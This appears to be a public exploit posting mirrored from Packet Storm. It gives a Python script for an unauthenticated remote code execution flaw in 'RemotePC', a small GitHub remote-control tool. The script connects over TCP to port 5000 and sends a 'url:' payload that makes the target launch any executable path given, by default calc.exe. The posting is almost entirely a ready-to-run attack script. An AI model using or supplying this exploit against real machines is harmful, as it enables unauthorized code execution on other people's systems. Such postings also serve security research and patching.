Share
## https://sploitus.com/exploit?id=PACKETSTORM:190462
# Exploit Title: RemotePC - Unauthenticated RCE
    # Date: 2025-04-14
    # Exploit Author: Ahmet รœmit BAYRAM
    # Vendor: https://github.com/akoc95/RemotePC
    # Version: latest
    # Tested on: Windows 10 - 64bit
    # CVE: N/A
    
    #!/usr/bin/env python3
    import socket
    import argparse
    
    def exploit_rce(host, port, target_path):
    print(f"[+] Connecting to {host}:{port}")
    try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    payload = f"url:{target_path}"
    s.sendall(payload.encode())
    print(f"[+] Payload sent: {payload}")
    print("[+] Exploit triggered. If vulnerable, command is executed.")
    except Exception as e:
    print(f"[!] Connection failed: {e}")
    
    if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="RemotePC TCPListener
    Unauthenticated RCE Exploit")
    parser.add_argument("--host", required=True, help="Target IP address")
    parser.add_argument("--port", type=int, default=5000, help="Target port
    (default: 5000)")
    parser.add_argument("--path", default="C:\\Windows\\System32\\calc.exe",
    help="Executable path to run on target")
    
    args = parser.parse_args()
    exploit_rce(args.host, args.port, args.path)